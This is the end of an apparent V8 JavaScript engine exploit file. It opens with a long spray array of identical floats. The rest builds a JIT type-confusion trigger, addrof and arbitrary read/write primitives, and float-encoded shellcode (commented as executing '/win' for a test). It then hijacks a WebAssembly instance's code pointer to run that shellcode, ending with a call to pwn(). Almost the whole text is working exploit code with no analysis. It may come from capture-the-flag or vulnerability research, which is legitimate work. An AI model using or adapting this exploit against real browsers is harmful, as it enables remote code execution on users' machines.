2.2431044572652967563980781402e-308, 241 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 242 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 243 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
244 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 245 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 246 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 247 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 248 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 249 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 250 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 251 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 252 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 253 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 254 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 255 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 256 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 257 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 258 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 259 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 260 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 261 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 262 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 263 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 264 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 265 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 266 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 267 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 268 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
269 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 270 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 271 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 272 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 273 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 274 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 275 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 276 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 277 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 278 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 279 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 280 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 281 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 282 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 283 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 284 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 285 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 286 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 287 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 288 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 289 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 290 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 291 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 292 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 293 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
294 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 295 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 296 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 297 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 298 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 299 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 300 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 301 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 302 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 303 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 304 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 305 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 306 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 307 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 308 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 309 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 310 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 311 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 312 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 313 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 314 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 315 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 316 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 317 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 318 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
319 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 320 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 321 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 322 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 323 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 324 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 325 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 326 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 327 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 328 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 329 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 330 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 331 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 332 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 333 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 334 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 335 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 336 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 337 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 338 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 339 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 340 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 341 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 342 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 343 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
344 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 345 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 346 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 347 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 348 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 349 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 350 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 351 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 352 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 353 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 354 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 355 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 356 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 357 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 358 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 359 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 360 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 361 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 362 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 363 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 364 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 365 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 366 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 367 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 368 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
369 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 370 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 371 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 372 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 373 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 374 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 375 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 376 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 377 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 378 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 379 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 380 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 381 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 382 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 383 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 384 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 385 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 386 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 387 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 388 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 389 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 390 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 391 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 392 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 393 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
394 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 395 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 396 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 397 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 398 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 399 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 400 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 401 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 402 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 403 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 404 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 405 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 406 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 407 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 408 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 409 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 410 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 411 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 412 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 413 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 414 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 415 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 416 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 417 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 418 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 
419 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 420 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 421 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 422 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 423 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 424 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 425 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 426 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 427 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 428 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 429 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 430 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 431 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 432 | ]; 433 | 434 | let esc; 435 | function trigger(callback) { 436 | for (const key in object2) { 437 | callback(); 438 | esc = object2[key]; 439 | } 440 | } 441 | 442 | for (let i = 0; i < 0x10000; i++) { 443 | trigger((_) => _); 444 | trigger((_) => _); 445 | trigger((_) => _); 446 | trigger((_) => _); 447 | } 448 | sleep(2000); 449 | trigger((_) => { 450 | object3.c = 1.1; 451 | for (const key in object1) { 452 | } 453 | }); 454 | 455 | //exec "/win" for test 456 | const shellcode = () => { 457 | return [ 458 | 1.97118289794847608001401956399e-246, 459 | 1.95606125617386423530332076722e-246, 460 | 1.99957147195425773436923756715e-246, 461 | 1.95337673326740932133292175341e-246, 462 | 2.63486047652296056448306022844e-284, 463 | ]; 464 | }; 465 | 466 | for (var i = 0; i < 0x10000; i++) { 467 | shellcode(); 468 | shellcode(); 469 | shellcode(); 470 | shellcode(); 471 | } 472 | sleep(2000); 473 | // fake_object_array; 474 | // 
%DebugPrint(driver_array); 475 | // %DebugPrint(float_array); 476 | // %DebugPrint(obj_array); 477 | // %DebugPrint(esc); 478 | 479 | function addrof(obj) { 480 | obj_array[0] = obj; 481 | return helper.ftoil(esc[14]); 482 | } 483 | // let a = {}; 484 | // %DebugPrint(a); 485 | // // console.log(helper.hex(addrof(a))); 486 | function aar(addr) { 487 | const fake_length_elements = helper.pair_i32_to_f64(addr - 8, 8); 488 | esc[12] = fake_length_elements; 489 | return float_array[0]; 490 | } 491 | let cagebase = helper.ftoil(aar(0x300078 + 1)); 492 | // %DebugPrint(helper.hex(cagebase)); 493 | function aaw(addr, value) { 494 | const fake_length_elements = helper.pair_i32_to_f64(addr - 8, 8); 495 | esc[12] = fake_length_elements; 496 | float_array[0] = value; 497 | } 498 | 499 | var wasmCode = new Uint8Array([ 500 | 0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 501 | 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 502 | 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 503 | 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 504 | 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11, 505 | ]); 506 | var wasmModule = new WebAssembly.Module(wasmCode); 507 | var wasmInstance = new WebAssembly.Instance(wasmModule, {}); 508 | var f = wasmInstance.exports.main; 509 | 510 | let wasm_instance_addr = addrof(wasmInstance); 511 | // %DebugPrint(shellcode); 512 | let code_addr = aar(addrof(shellcode) + 8); 513 | let ins_addr = aar(helper.ftoih(code_addr) + 0x10); 514 | let real_addr = helper.pair_i32_to_f64( 515 | helper.ftoih(ins_addr) + 0x7d, 516 | cagebase 517 | ); 518 | // %DebugPrint(helper.hex(helper.f64toi64(real_addr))); 519 | // %DebugPrint(helper.hex(wasm_instance_addr)); 520 | // %DebugPrint(wasmInstance); 521 | aaw(wasm_instance_addr + 0x48, real_addr); 522 | f(); 523 | hang(); 524 | } 525 | 526 | pwn(); 527 | 
--------------------------------------------------------------------------------
